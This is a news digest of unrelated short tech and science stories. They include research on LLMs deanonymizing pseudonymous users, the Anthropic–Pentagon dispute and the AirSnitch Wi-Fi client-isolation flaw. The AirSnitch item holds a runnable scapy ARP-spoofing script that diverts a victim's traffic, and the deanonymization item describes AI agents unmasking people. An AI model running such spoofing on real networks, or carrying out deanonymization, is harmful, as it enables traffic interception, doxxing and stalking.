LLMs can unmask pseudonymous users at scale with surprising accuracy:
Burner accounts on social media sites can increasingly be analyzed with AI to identify the pseudonymous users who post to them, researchers said, in findings with far-reaching consequences for privacy on the Internet.
The finding, from a recently published research paper, is based on results of experiments correlating specific individuals with accounts or posts across more than one social media platform. The success rate was far greater than existing classical deanonymization work that relied on humans assembling structured data sets suitable for algorithmic matching or manual work by skilled investigators. Recall—that is, how many users were successfully deanonymized—was as high as 68 percent. Precision—meaning the rate of guesses that correctly identify the user—was up to 90 percent.
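As a rough illustration of how those two metrics interact, here is a minimal sketch in Python (a toy example of ours with made-up accounts and names, not code or data from the paper) that scores a set of deanonymization guesses against known ground truth:

    # Minimal sketch: scoring deanonymization guesses with precision and recall.
    # 'guesses' maps a pseudonymous account to the identity the attacker proposes;
    # 'truth' maps each account to its real owner. All data here is invented.
    def precision_recall(guesses, truth):
        correct = sum(1 for acct, who in guesses.items() if truth.get(acct) == who)
        precision = correct / len(guesses) if guesses else 0.0  # fraction of guesses that are right
        recall = correct / len(truth) if truth else 0.0         # fraction of users actually unmasked
        return precision, recall

    truth = {"acct1": "alice", "acct2": "bob", "acct3": "carol", "acct4": "dave"}
    guesses = {"acct1": "alice", "acct2": "bob", "acct3": "mallory"}  # 2 of 3 guesses correct

    p, r = precision_recall(guesses, truth)
    print(f"precision={p:.0%} recall={r:.0%}")  # precision=67% recall=50%

In this framing, an attacker can trade recall for precision by guessing only when confident, which matches the pattern the researchers describe of precision falling as more guesses are made.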
The findings have the potential to upend pseudonymity, an imperfect but often sufficient privacy measure used by many people to post queries and participate in sometimes sensitive public discussions while making it hard for others to positively identify the speakers. The ability to cheaply and quickly identify the people behind such obscured accounts opens them up to doxxing, stalking, and the assembly of detailed marketing profiles that track where speakers live, what they do for a living, and other personal information. The researchers argue that this measure of protection no longer holds.
"Our findings have significant implications for online privacy," the researchers wrote. "The average online user has long operated under an implicit threat model where they have assumed pseudonymity provides adequate protection because targeted deanonymization would require extensive effort. LLMs invalidate this assumption."
The researchers collected several datasets from public social media sites to test the techniques while preserving the privacy of the speakers. One of them combined posts from Hacker News with LinkedIn profiles, linking them by cross-platform references that appeared in user profiles. The researchers then stripped all identifying references from the posts and ran a large language model on them. A second dataset came from a Netflix release of micro-identities, such as individual preferences, recommendations, and transaction records; a 2008 research paper showed that this list could be used to identify users and infer their political affiliations and other personal information. The last dataset was built by splitting a single user's Reddit history.
"What we found is that these AI agents can do something that was previously very difficult: starting from free text (like an anonymized interview transcript) they can work their way to the full identity of a person," Simon Lermen, a co-author of the paper, told Ars. "This is a pretty new capability, previous approaches on re-identification generally required structured data, and two datasets with a similar schema that could be linked together."
Unlike those older pseudonymity-stripping methods, Lermen said, AI agents can browse the web and interact with it in many of the same ways humans do. They can use reasoning to match potential individuals. In one experiment, the researchers looked at responses to a questionnaire Anthropic conducted about how various people use AI in their daily lives. Using information taken from the answers, the researchers were able to positively identify 7 percent of 125 participants.
While a 7 percent recall is relatively low, it demonstrates the growing capability of AI to identify people based on very general information they gave. "The fact that AI can do this at all is a noteworthy result," Lermen said. "And as AI systems get better, they will likely get better at finding more and more identities."
In a second experiment, the researchers gathered comments made in 2024 from the r/movies subreddit and at least one of five smaller communities: r/horror, r/MovieSuggestions, r/Letterboxd, r/TrueFilm, and r/MovieDetails. The results showed that the more movies a candidate discussed, the easier it was to identify them. An average of 3.1 percent of users sharing one movie could be identified with a 90 percent precision, and 1.2 percent of them at a 99 percent precision. With five to nine shared movies, 90 percent and 99 percent precision rose to 8.4 percent and 2.5 percent of users, respectively. More than 10 shared movies bumped the percentage to 48.1 percent and 17 percent.
In a third experiment, the researchers took 5,000 users from the Netflix dataset and added another 5,000 "distraction" identities of people not in the results. They then added to the list of 10,000 candidate profiles 5,000 query distractors comprising users who appear only in a query set, with no true match in the candidate pool.
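That design means a successful attacker has to do two things: rank the right candidate above thousands of distractors and abstain when a query has no true match at all. The sketch below shows one way such an evaluation could be scored with a confidence threshold controlling abstention; the scoring function, names, and numbers are placeholders of ours, not the paper's method.

    # Sketch of scoring an attack over a candidate pool with distractors (placeholder
    # logic, not the paper's method). truth[q] is None for query distractors.
    def score_attack(truth, candidates, confidence, threshold):
        guesses = {}
        for q in truth:
            best = max(candidates, key=lambda c: confidence(q, c))
            if confidence(q, best) >= threshold:      # abstain below the confidence threshold
                guesses[q] = best
        correct = sum(1 for q, c in guesses.items() if truth[q] == c)
        linkable = sum(1 for t in truth.values() if t is not None)
        precision = correct / len(guesses) if guesses else 0.0  # how often a guess is right
        recall = correct / linkable if linkable else 0.0        # how many linkable users were found
        return precision, recall

    # Example with made-up data: q3 is a query distractor with no real match.
    truth = {"q1": "userA", "q2": "userB", "q3": None}
    pool = ["userA", "userB", "userC"]
    conf = lambda q, c: {("q1", "userA"): .95, ("q2", "userC"): .70, ("q3", "userB"): .40}.get((q, c), .05)
    print(score_attack(truth, pool, conf, threshold=0.6))  # (0.5, 0.5): one right, one wrong, one abstained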
When a classical baseline mimicking the Netflix Prize attack was compared with LLM deanonymization, the latter far outperformed the former.
The researchers wrote:
(a) The precision of classical attacks drops very fast, explaining its low recall. In contrast, the precision of LLM-based attacks decays more gracefully as the attacker makes more guesses. (b) The classical attack almost fails completely even at moderately low precision. In contrast, even the simplest LLM attack (Search) achieves non-trivial recall at low precision, and extending it with Reason and Calibrate steps doubles Recall @99% Precision.
The results show that LLMs, while still prone to false positives and other weaknesses, are quickly outstripping more traditional, resource-intensive methods for identifying users online.
The researchers went on to propose mitigations, including platforms enforcing rate limits on API access to user data, detecting automated scraping, and restricting bulk data exports. LLM providers could also monitor for the misuse of their models in deanonymization attacks and build guardrails that make models refuse deanonymization requests.
Of course, another option is for people to dramatically curb their use of social media, or at a minimum, regularly delete posts after a set time threshold.
If LLMs' success in deanonymizing people improves, the researchers warn, governments could use the techniques to unmask online critics, corporations can assemble customer profiles for "hyper-targeted advertising," and attackers could build profiles of targets at scale to launch highly personalized social engineering scams.
"Recent advances in LLM capabilities have made it clear that there is an urgent need to rethink various aspects of computer security in the wake of LLM-driven offensive cyber capabilities, the researchers warned. "Our work shows that the same is likely true for privacy as well."
Medical journal The Lancet blasts RFK Jr.'s health work as a failure:
The medical journal The Lancet did not pull any punches in a scathing editorial on Robert F. Kennedy Jr., calling the anti-vaccine activist's first year as US Health Secretary "a failure by most measures, especially his own."
The Lancet is one of the world's oldest academic medical journals still in publication and one of the most cited sources of peer-reviewed medical research. But it is also well-known for publishing an infamous study by prominent anti-vaccine activist and disgraced ex-physician Andrew Wakefield, which falsely claimed to find a link between vaccines and autism. The Lancet retracted the study more than a decade later.
Kennedy is among the prominent anti-vaccine activists who continue to embrace the thoroughly debunked claim, along with other dangerous conspiracy theories. The Lancet assailed Kennedy for spreading misinformation as the country's top health official and politicizing health policy at the expense of vulnerable Americans, including children.
"The destruction that Kennedy has wrought in one year might take generations to repair, and there is little hope for US health and science while he remains at the helm," the journal's editorial board wrote in its latest issue.
The journal's board noted that when Kennedy first took the role a year ago, he laid out noble ambitions of "radical transparency" and "gold-standard science." But within days Kennedy appeared to abandon those ideals. He rescinded a 54-year-old policy of soliciting public comments on federal actions, summarily dismissed expert advisors and scientific experts, issued altered health recommendations that run counter to decades of scientific evidence, and shut down programs studying critical health issues, such as air pollution and cancer.
As secretary of the US Department of Health and Human Services, Kennedy oversees the National Institutes of Health, the Food and Drug Administration, and the Centers for Disease Control and Prevention—all of which Kennedy is currently driving into the ground, according to the Lancet. His "politicization at the NIH, FDA, and CDC is imperiling the future of US science and innovation and throttling the public health enterprise that keeps the country safe today," the board wrote.
Kennedy has orchestrated an unprecedented overhaul of the CDC's childhood vaccine recommendations, which has been rejected by more than half of US states. He granted $1.6 million for a vaccine trial in Guinea-Bissau that the World Health Organization called "unethical," comparing it to the shameful Untreated Syphilis Study at Tuskegee. Under Kennedy, HHS has "made a habit of throwing good money after bad science," and elevated "junk science and fringe beliefs," the editorial states. Meanwhile, promising research, including on mRNA technology, and critical disease monitoring, such as of explosive cases of measles and pertussis (whooping-cough), are being abandoned or neglected.
In all, The Lancet joined a chorus of voices in the medical and scientific community calling for Kennedy's resignation and for Congress to hold him accountable.
While the medical journal had no kind words for Kennedy, the feeling is mutual. In the past, Kennedy has assailed top medical journals, including The Lancet, as "corrupt" for being influenced by the pharmaceutical industry—a common attack Kennedy uses against his critics.
Euro News reports on a growing movement against ChatGPT after its contract with the Pentagon:
An online campaign urging users to quit OpenAI's ChatGPT is gathering momentum after a high-profile standoff between AI company Anthropic and the US Department of Defence.
Known as "QuitGPT", the movement claims that more than 1.5 million people have taken action, either by cancelling subscriptions, sharing boycott messages on social media, or signing up via quitgpt.org.
Last week, Anthropic CEO Dario Amodei said he "cannot in good conscience accede to the Pentagon's request" for unrestricted access to the company's AI systems.
"In a narrow set of cases, we believe AI can undermine, rather than defend, democratic values," Amodei wrote. "Some uses are also simply outside the bounds of what today's technology can safely and reliably do."
Anthropic - which makes the chatbot Claude - is the last major AI firm yet to supply its technology to a new US military internal network.
The company reportedly faced a deadline from the Department of Defence to loosen ethical guardrails or risk losing a $200 million (€167 million) contract awarded last July to "prototype frontier AI capabilities that advance US national security".
In a statement published on its website, QuitGPT says: "On February 27, ChatGPT competitor Anthropic refused to give the Pentagon unrestricted access to its AI for mass surveillance of Americans or producing AI weapons that kill without human oversight."
QuitGPT argues that many users wrongly believe ChatGPT is the only viable AI assistant and is urging people to switch platforms. It recommends what it says are higher-privacy and open-source alternatives such as Confer, Alpine and Lumo, as well as corporate rivals including Gemini from Google and Claude from Anthropic.
Gartner previously projected AI PCs would reach 50% market penetration before the end of the decade, but rising memory prices on premium-tier hardware will push that milestone back to 2028. AI PCs, of course, require more onboard memory to run local inference workloads, making them especially exposed to DRAM cost increases.
Longer upgrade cycles will follow directly from higher prices, and Gartner says that PC lifetimes will extend by 15% for business buyers and 20% for consumers by the end of 2026, a trend it noted will raise concerns about security vulnerabilities on aging hardware.
For the PC market, demand will increasingly concentrate at the top end, where vendors carry enough margin to absorb component inflation without destroying profitability. Gartner advised vendors to accept unit volume decline rather than cut prices to chase budget buyers. "Overall, device vendors and channels face a critical window in the first half of 2026 to optimize pricing and protect margins before component inflation compresses profitability from the second quarter onwards," Atwal said.
The forecast covers smartphones as well, where shipments are projected to fall 8.4% this year. Gartner estimated basic smartphone buyers will exit the market five times faster than premium buyers in 2026 as rising costs push consumers toward refurbished or second-hand alternatives.
Across Cultures, People Combine Reference Frames to Orient Themselves:
When walking through an unfamiliar city, we might rely on different types of directions. Head east out of the train station, take a left at the stop light, turn at the building with the mural.
To move through complex environments and keep track of where objects are, people use reference points either in relation to their own body (for example, to their left) or based on features of their environment (next to the window, across from the door).
As someone moves around, the body-based references, called egocentric reference frames, may change, whereas the environmental references, allocentric reference frames, stay the same. For instance, a tree on the left when walking in one direction is on the right when walking in the other direction, but the tree is always next to the mailbox.
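As a toy illustration of that difference (our own sketch, not taken from the study), the few lines of Python below compute where a landmark falls in an observer's egocentric frame as their heading changes, while its allocentric relation to another landmark stays put:

    import math

    # Toy example: a tree at fixed world coordinates, viewed from the same spot while
    # facing north and then south. Coordinates and landmark names are invented.
    def egocentric(landmark, observer, heading_deg):
        """Rotate world coordinates into the observer's body frame; heading is
        measured clockwise from north. Returns (forward, left) distances."""
        dx, dy = landmark[0] - observer[0], landmark[1] - observer[1]
        h = math.radians(heading_deg)
        forward = dx * math.sin(h) + dy * math.cos(h)
        left = -dx * math.cos(h) + dy * math.sin(h)
        return forward, left

    tree, mailbox, me = (-3.0, 5.0), (-3.0, 6.0), (0.0, 0.0)

    for heading in (0, 180):  # facing north, then south
        fwd, left = egocentric(tree, me, heading)
        side = "left" if left > 0 else "right"
        print(f"heading {heading:3d} deg: tree is {abs(left):.0f} m to the {side}")

    # The allocentric relation never changes: the tree stays 1 m south of the mailbox.
    print("tree relative to mailbox:", (tree[0] - mailbox[0], tree[1] - mailbox[1]))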
Different cultures use different reference frames, perhaps as a product of language. Americans, who are thought to prefer body-based references, tend to talk egocentrically.
"We say things like, 'You have some food on your left cheek,'" said Benjamin Pitt, a research fellow at the Institute for Advanced Study in Toulouse, in an interview with the Observer. "We would never say that you have some food on your down-river cheek or on your east cheek, but other cultures do."
Additionally, the physical reality of where we live influences our frames of reference. Rather than looking left and right to cross a street, people growing up in the Amazon rainforest cross rivers by looking upriver to check for hazards.
In the natural world, "There's really no reason or very little reason to keep track of left–right spatial distinctions," said Pitt. "Instead, there's good reasons to keep track of allocentric spatial distinctions. It's all about where things are in the environment, and the environment tends to not be organized with respect to our bodies."
[...] Pitt suspects people use different references for left–right and front–back because keeping track of left–right spatial distinctions is harder.
"We have expressions like, 'No, your other left,'" said Pitt. "Nobody is confusing their front from their back. Nobody's like, 'No, your other front.' It's so completely obvious, which is your front and which is your back."
For those more difficult left–right distinctions, people may abandon body-based references for easier environmental references.
"You can just pick something in the environment that's sitting there staring at you," said Pitt. "You don't have to worry about whether it was on your left or your right because that's too confusing."
But people don't use environment-based references for everything. It seems a combination is best, regardless of where you live.
"If you want to move your body through the world, then you're going to need to integrate these things," Pitt said.
Journal Reference: Pitt, B. (2025). One action, two reference frames: Compound cognitive maps of object location. Psychological Science, 36(11), 862–873. https://doi.org/10.1177/09567976251391172
The Norwegian Consumer Council has published a new report, Breaking Free: Pathways to a fair technological future, about countering big tech's growing abuse of its increasingly concentrated power. The 100-page PDF is accompanied by two cover letters, one in English to various EU/EEA/UK and US institutions, and one in Norwegian to Norwegian authorities. The report starts with the problem of platform decay now known colloquially as enshittification. One change it demands is that action be taken proactively:
Traditional competition tools are ex-post and focused on the abuse of market dominance by individual companies. The drivers of enshittification cannot always be linked to one dominant company's abuse of its dominance. When enforcement relies on established harms rather than potential market disruptions, it will often also be too late – either because the digital market has already been skewed in big tech companies' favor or because big tech can argue that the case is no longer relevant.
The New Competition Tool allows authorities to investigate more general market failures that could potentially lead to future lock-in effects and implement interim measures before any harms have materialised. It gives competition authorities more flexibility when it comes to which services and practices can be investigated, and would allow them to investigate some of the drivers of enshittification, such as lock-in effects. In Norway, Germany and the UK, competition authorities already have such powers. These powers should be extended to other authorities, including to the European Commission.
However, the keys to platform independence, open standards (including file formats and protocols), get mentioned only in passing, although the goal of open standards, interoperability (whether cooperative or adversarial), does get more coverage.
Via Louis Rossmann's video Norwegian Government comes out swinging on enshittification (also on Odysee), in which he discusses the Norwegian Consumer Council's hard-hitting, 4-minute video on the scope of the problem.
Previously:
(2026) A Post-American, Enshittification-Resistant Internet
(2025) As Internet Enshittification Marches On, Here are Some of the Worst Offenders
(2024) Cory Doctorow Has a Plan to Wipe Away the Enshittification of Tech
(2023) Enshittification Everywhere. Your Car, Your Phone, Your Tractor, Your Computer...
https://www.slashgear.com/2112936/africa-coast-brown-ribbon-scientist-alarm/
When you hear that something strange has appeared in satellite footage, it just sounds immediately ominous. When scientists raised the alarm about a brown belt that's longer than a continent, it definitely seemed alarming. But what exactly is the brown stripe that stretches across the Atlantic Ocean? And more importantly, should we be worried?
Satellites started detecting a brown stripe that stretches from the West African coast to the Gulf of Mexico. The strange object is actually 37.5 million tons of brown seaweed, a species called pelagic sargassum, once only found in the Sargasso Sea.
For the last 15 years, however, it's been spreading into the Atlantic — which is already at its "tipping point." Researchers at the Harbor Branch Oceanographic Institute at Florida Atlantic University have been analyzing four decades of satellite data, which has documented the seaweed's rapid growth in the Atlantic. The phenomenon is now called the Great Sargassum Belt, and it's not only disrupting ocean habitats and destroying beaches — it could be accelerating global warming.
Why is the pelagic sargassum spreading at such an alarming rate? Scientists have been researching this phenomenon since the 1980s and have found that the nitrogen content in the brown seaweed has increased by 55% between 1980 and 2020 — the nitrogen to phosphorus ratio also increased by 50%.
This means that the brown seaweed isn't only getting nutrients from natural ocean upwelling — a process where warm water is pushed off the coastline to allow more cold, nutrient-rich water from the deep ocean to rise to the surface. Due to human activity — like agricultural runoff and wastewater discharge — brown seaweed is getting its nutrients from land.
Pelagic sargassum is transported into the Atlantic by ocean currents, especially when the Amazon River floods. Instead of dying off away from its safe haven of the Sargasso Sea, the brown seaweed is thriving in this new location thanks to the added nutrients.
Over the past few decades, the rapid increase in thriving brown seaweed in the Atlantic has caused some shocking incidents. "These nutrient-rich waters fueled high biomass events along the Gulf Coast, resulting in mass strandings, costly beach cleanups and even the emergency shutdown of a Florida nuclear power plant in 1991," noted Brian Lapointe, Ph.D., the lead author of the Harmful Algae study and a research professor at Florida Atlantic University.
While the brown seaweed is not harmful as a species — and even acts as a habitat for over 100 species of fish, invertebrates, and turtles — this new brown belt has massively disrupted the ecosystem. Large amounts of sargassum wash ashore and begin to rot, releasing toxic hydrogen sulfide gas as it decomposes. The rotting seaweed damages coral reefs, reduces oxygen around the beach, and emits harmful greenhouse gases that could disrupt climate feedback loops.
Researchers are monitoring the brown belt and warning that humans should reduce nutrient runoff from the shore. If nothing changes, the brown seaweed may create similar phenomena in other regions, meaning more Great Sargassum Belts across the ocean. According to recent satellite footage, there's still time to combat climate change if changes are made.
An interesting analysis:
There is a rush for AI companies to team up with space launch/satellite companies to build data centres in space. TL;DR: It's not going to work.
In the interests of clarity, I am a former NASA engineer/scientist with a PhD in space electronics. I also worked at Google for 10 years, in various parts of the company, including YouTube and the bit of Cloud responsible for deploying AI capacity, so I'm quite well placed to have an opinion here.
The short version: this is an absolutely terrible idea, and really makes zero sense whatsoever. There are multiple reasons for this, but they all amount to saying that the kind of electronics needed to make a datacenter work, particularly a datacenter deploying AI capacity in the form of GPUs and TPUs, is exactly the opposite of what works in space. If you've not worked specifically in this area before, I'll caution against making gut assumptions, because the reality of making space hardware actually function in space is not necessarily intuitively obvious.
[Source]: https://taranis.ie/datacenters-in-space-are-a-terrible-horrible-no-good-idea/
Cleaner ship fuel is reducing lightning in key shipping lanes, KU research shows:
Cuts in sulfur emissions from oceangoing vessels have been tied to a reduction in lightning stroke density along heavily trafficked shipping routes in the Bay of Bengal and the South China Sea, according to new research from the University of Kansas.
Previous studies had found frequent lightning along shipping routes over the Bay of Bengal before a 2020 International Maritime Organization rule capped sulfur in fuel used by oceangoing ships, leading to a roughly 70% drop in sulfate emissions in the Bay of Bengal.
"I think there are two reasons for this," said lead author Qinjian Jin, assistant teaching professor of geography & atmospheric science at KU. "The first is the shipping activity is so frequent that it releases a lot of sulfate aerosols, more than other oceanic regions. The second is that the Bay of Bengal is an area where we see lots of strong convection that is required for lightning to occur. I think both reasons contribute to the observed frequent lightning activity over this region."
Jin said these two ocean regions best revealed the connection between shipping emissions and lightning. The KU researcher and his colleagues found lightning-stroke density — the number of individual lightning discharges, or "strokes," per square kilometer — to be about 36% lower than before the 2020 IMO sulfur cap.
"The drop in sulfates from ships can cause fewer cloud condensation nuclei, larger cloud drops, weaker convection and storms, and thus fewer ice crystals and less frequent lightning," Jin said.
[...] "When we have more sulfate aerosols, or more cloud nuclei, the cloud droplets become smaller," he said. "When they're smaller, it's harder for precipitation to occur. Clouds can last longer in the atmosphere. With a longer lifetime, they have a higher chance to develop into high clouds, where ice clouds form. When we have more ice clouds, we have a higher chance of lightning. That is how sulfate aerosols can be connected to lightning."
While the 2020 regulations on shipping were intended to clean up the air, the reduction in lightning can be seen as a side benefit, since lightning can be dangerous to mariners and equipment and can hinder visibility and normal operations at sea. Jin said another consequence of the shipping regulation might be warmer global temperatures.
"Due to the 2020 emission regulation imposed by the International Maritime Organization, we observed a decrease in sulfur emissions from ships after 2020," he said. "With less sulfate aerosol emitted from ships, we observed darker clouds over the North Atlantic Ocean and the Pacific Ocean. Because clouds become darker, they absorb more solar radiation. Our previous studies imply that the decrease in shipping sulfate aerosols could be responsible for the record-breaking global warming temperatures in 2023 and 2024."
Journal Reference: Jin, Q., Huang, J., Wei, J. et al. Observational evidence of reduced Bay of Bengal lightning since 2020 linked to cloud responses to shipping emission regulations. npj Clim Atmos Sci 8, 350 (2025). https://doi.org/10.1038/s41612-025-01256-w
MotorTrend reports https://www.motortrend.com/news/kia-plant-solar-power-hail-protection that the Kia assembly plant in Georgia suffered very expensive hail damage to new cars waiting to be shipped during a storm in 2023. The fix is a massive raised solar array of 3.2 million square feet (about 300,000 square meters) over the car park/storage area.
The system has about 17,000 solar panels on the columns of a structure that is large enough to protect about 15,000 vehicles from the elements until they are loaded onto trucks or rail cars for delivery. Hail damage costs billions of dollars a year.
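For a rough sense of scale, here is a back-of-the-envelope check of our own using only the figures quoted above; the per-vehicle and per-panel numbers are simple divisions, not specifications from Kia or the installer.

    # Back-of-the-envelope arithmetic using the figures quoted in the article.
    area_ft2 = 3_200_000
    area_m2 = area_ft2 * 0.09290304            # 1 sq ft = 0.09290304 m^2
    vehicles = 15_000
    panels = 17_000

    print(f"{area_m2:,.0f} m^2 total")                               # ~297,000 m^2, i.e. roughly 300,000 m^2
    print(f"{area_ft2 / vehicles:,.0f} sq ft of cover per vehicle")  # ~213 sq ft, about one parking space
    print(f"{area_m2 / panels:,.1f} m^2 of structure per panel")     # ~17.5 m^2 of roof area per panel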
The panels are not all connected yet. Construction began in 2024 and the goal was to be done in the first quarter of 2026 but panels are still being installed. It should be finished this spring.
VPS [Vehicle Protection Structures] has provided this kind of protection to dealerships, but this is the first large-scale execution for an assembly plant.
The partnership is also working with Georgia Power to optimize energy production and integrate the power generated by the solar panels into the plant. The panels will be capable of supplying 10 percent of the plant's energy needs. The project also qualified for credits under the U.S. Inflation Reduction Act until that act was terminated.
Pics at the link, sort of like large "pop-up" shelters. To your AC submitter it's quite attractive.
Insuring the solar panels for hail damage seems like it would be cheaper than insurance to cover the same area of cars.
The US military mistakenly shot down a Customs and Border Protection (CBP) drone near the Mexican border in a strike that reportedly used a laser-based anti-drone system. The CBP uses drones to track people crossing the border.
"Congressional aides told Reuters the Pentagon used the high-energy laser system to shoot down a Customs and Border Protection drone near the Mexican border, in an area that often has incursions from Mexican drones used by drug cartels," Reuters reported last night.
[...] "The Defense Department didn't realize the drone was being flown by CBP when it shot it down," and "had not first coordinated the use of the laser system with the US Federal Aviation Administration," Bloomberg wrote, citing anonymous sources.
The military hasn't been coordinating counter-drone measures with the FAA, and "CBP drone operators didn't inform the military's laser unit that it was launching," Bloomberg wrote, citing anonymous sources. Because the CBP didn't notify the Defense Department, the military viewed the aircraft as "an unknown drone," the Times wrote, citing an unnamed Pentagon official.
The latest incident came about two weeks after the FAA abruptly closed airspace over El Paso for a few hours, leading to flight cancellations. In the early February incident, CBP was the one that fired the laser. The CBP was "using the same technology on loan from the military to combat drug-smuggling" and "fired a high-energy laser at what they thought was a drone," but turned out to be a party balloon, the Times wrote.
"In both cases, the lasers were used without the FAA's approval, which many aviation safety experts maintain is a violation of the law," the Times wrote.
[...] The Pentagon, CBP, and FAA confirmed some details of the incident in a joint statement provided to Ars by the Pentagon today. The statement said the "engagement occurred when the Department of War employed counter-unmanned aircraft system authorities to mitigate a seemingly threatening unmanned aerial system operating within military airspace. The engagement took place far away from populated areas and there were no commercial aircraft in the vicinity."
[...] The statement did not mention that the drone was a CBP drone, and the Pentagon declined to provide further details to Ars.
Anthropic cites risks of autonomous military applications, mass domestic surveillance:
President Donald Trump ordered every U.S. federal agency to stop using technology from AI company Anthropic on Friday, February 27, posting the directive to Truth Social at 3:47 PM ET — more than an hour before the Pentagon's own 5:01 PM ET deadline for Anthropic to comply with its demands.
“THE UNITED STATES OF AMERICA WILL NEVER ALLOW A RADICAL LEFT, WOKE COMPANY TO DICTATE HOW OUR GREAT MILITARY FIGHTS AND WINS WARS,” Mr. Trump fumed on Truth Social, adding that he is directing every U.S. federal agency to “IMMEDIATELY CEASE all use of Anthropic's technology.”
[...] After months of private talks collapsed into a public standoff this week, Amodei said Thursday his company "cannot in good conscience accede" to the DoD's terms. The Pentagon responded by threatening to invoke the Korean War-era Defense Production Act to compel Anthropic's compliance and warned it would designate the company a "supply chain risk" — a label typically reserved for companies from adversarial nations such as Huawei.
[...] Claude was the only AI model approved for use in classified military systems, and defense software firm Palantir, which uses Claude to power its most sensitive government contracts, will need to find a replacement quickly. OpenAI CEO Sam Altman said Friday he shares Anthropic's position on autonomous weapons' ethical "red lines," complicating OpenAI's candidacy as a direct replacement.
Also see:
• Trump Slams Anthropic as 'Woke,' Orders Feds to Stop Using Claude AI
• Claude won't be allowed to engage in mass surveillance or power fully autonomous weapons
Meanwhile:
OpenAI said it had struck a deal with the Pentagon to supply AI to classified US military networks, hours after Donald Trump ordered the government to stop using the services of one of the company's main competitors.
Sam Altman, OpenAI's CEO, announced the move on Friday night. It came after an agreement between Anthropic, a rival AI company that runs the Claude system, and the Trump administration broke down after Anthropic sought assurances its technology would not be used for mass surveillance – nor for autonomous weapons systems that can kill people without human input.
Announcing the deal, Altman insisted that OpenAI's agreement with the government included assurances that it would not be used to those ends.
[...] If OpenAI's deal does prohibit its systems from being used for unethical ends, it would appear the company has succeeded in receiving assurances where Anthropic could not. Altman announced the deal with the government shortly after the president said he would direct all federal agencies to "IMMEDIATELY CEASE" all use of Anthropic technology.
[...] It remains to be seen how OpenAI staff respond to the government deal. In its battle with the Trump administration, Anthropic has drawn support from its most fierce rivals. Nearly 500 OpenAI and Google employees signed on to an open letter saying "we will not be divided".
"The Pentagon is negotiating with Google and OpenAI to try to get them to agree to what Anthropic has refused," the letter reads. "They're trying to divide each company with fear that the other will give in."
There's a silent vulnerability lurking underneath the architecture of Wi-Fi networks:
A team of researchers from the University of California, Riverside revealed a series of weaknesses in existing Wi-Fi security, allowing them to intercept data on networks they had already connected to, even with client isolation in place.
The group called this vulnerability AirSnitch, and, according to their paper [PDF], it exploits inherent weaknesses in the networking stack. Since Wi-Fi does not cryptographically link client MAC addresses, Wi-Fi encryption keys, and IP addresses through Layers 1, 2, and 3 of the network stack, an attacker can abuse this gap to assume the identity of another device and confuse the network into diverting downlink and uplink traffic through it.
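To see why that missing binding matters, it helps to recall the long-standing example of ARP spoofing on a shared network: nothing stops one client from claiming another client's IP address, so the forwarding device starts handing the victim's downlink traffic to the attacker. The sketch below, using the Python scapy library, is a generic illustration of that unauthenticated MAC-to-IP binding, with placeholder addresses; it is not the AirSnitch primitives described in the paper.

    # Generic ARP-spoofing illustration of the unauthenticated MAC<->IP binding.
    # Addresses and interface name are placeholders; this is NOT the paper's attack.
    from scapy.all import ARP, Ether, sendp

    victim_ip = "192.168.1.50"          # client whose traffic we want diverted
    gateway_ip = "192.168.1.1"
    attacker_mac = "aa:bb:cc:dd:ee:ff"  # our own interface's MAC address

    # Tell the gateway that victim_ip now lives at attacker_mac. A device that
    # trusts this unauthenticated claim will send the victim's downlink frames
    # to the attacker instead of to the victim.
    spoof = Ether(src=attacker_mac) / ARP(op=2, psrc=victim_ip, hwsrc=attacker_mac, pdst=gateway_ip)
    sendp(spoof, iface="wlan0", loop=1, inter=2)  # keep re-asserting the bogus mapping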
Xin'an Zhou, the lead author on the research, said in an interview, according to Ars Technica, that AirSnitch "breaks worldwide Wi-Fi encryption, and it might have the potential to enable advanced cyberattacks." He also added, "Advanced attacks can build on our primitives to [perform] cookie stealing, DNS and cache poisoning. Our research physically wiretaps the wire altogether so these sophisticated attacks will work. It's really a threat to worldwide network security."
AirSnitch does not break encryption at all, but it challenges the general assumption that encrypted clients cannot attack each other because they've been cryptographically isolated.
[...] The researchers found that these vulnerabilities exist in five popular home routers — Netgear Nighthawk x6 R8000, Tenda RX2 Pro, D-LINK DIR-3040, TP-Link Archer AXE75, and Asus RT-AX57 — two open-source firmwares — DD-WRT v3.0-r44715 and OpenWrt 24.10 — and across two university enterprise networks. This shows that the issue is not just limited to how manufacturers make and program their routers. Instead, it’s a problem with Wi-Fi itself, where its architecture is vulnerable to attackers who know how to take advantage of its flaws.
While this may sound bad, the researchers pointed out that this type of attack is rather complicated, especially given how complex modern wireless networks have become. Still, that does not mean that manufacturers and standardization groups should ignore this problem. The group hoped that this revelation would force the industry to come together and create a rigorous set of requirements for client isolation and avoid this flaw in the future.
https://www.slashgear.com/2107938/removable-battery-phones-making-comeback/
Many of today's mobile phones, like the slim iPhone Air, are lightweight and sleek, with an advanced design and the latest in modern technology. It's a far cry from previous models, which were bulkier, had buttons, and bulged in your pocket. But while mobile phones have evolved over the years, the current fixed-battery design is set to revert to an older form, thanks to legislation from the European Union (EU). Under these new guidelines, phones will once again need batteries that can be safely removed and replaced by the user.
The EU's legislation also mandates that replacement batteries, while meeting the device's technical specifications, not be bound by proprietary limits. This means that a phone must be able to accept a compatible battery that meets the device's safety and technical standards, whether or not it's manufacturer-branded. Plus, replacement batteries must be available to the user for at least 5 to 7 years following a model's end of production. The EU has set February 18, 2027, as the date by which these expectations must be met.
[...] The EU's new legislation requiring smartphones to have removable batteries accomplishes a few different things. First, allowing users to replace a spent battery with a new one helps extend the life of the device before its final disposal. Plus, it also enables battery repair or replacement without throwing out the entire phone. By giving users this capability, the rules are meant to encourage reuse of existing phones and help cut down on electronic waste.
[...] But if removable batteries become the norm once again, then phone design could take a step backward in terms of overall construction. That's because cases may need to become thicker to accommodate the removable batteries, and additional safety features would need to be added to protect the new design as well. Until the top phone manufacturers reveal newer models to satisfy the EU's standards, it's unclear what changes users can expect to see.
By now, it's firmly established that modern humans and their Neanderthal relatives met and mated as our ancestors expanded out of Africa, resulting in a substantial amount of Neanderthal DNA scattered throughout our genome. Less widely recognized is that some of the Neanderthal genomes we've seen have pieces of modern human DNA as well.
Not every modern human has the same set of Neanderthal DNA, however; different people will, by chance, have inherited different fragments. But there are also some areas, termed "Neanderthal deserts," where none of the Neanderthal DNA seems to have persisted. Notably, the largest Neanderthal desert is the entire X chromosome, raising questions about whether this reflects the evolutionary fitness of genes there or mating preferences.
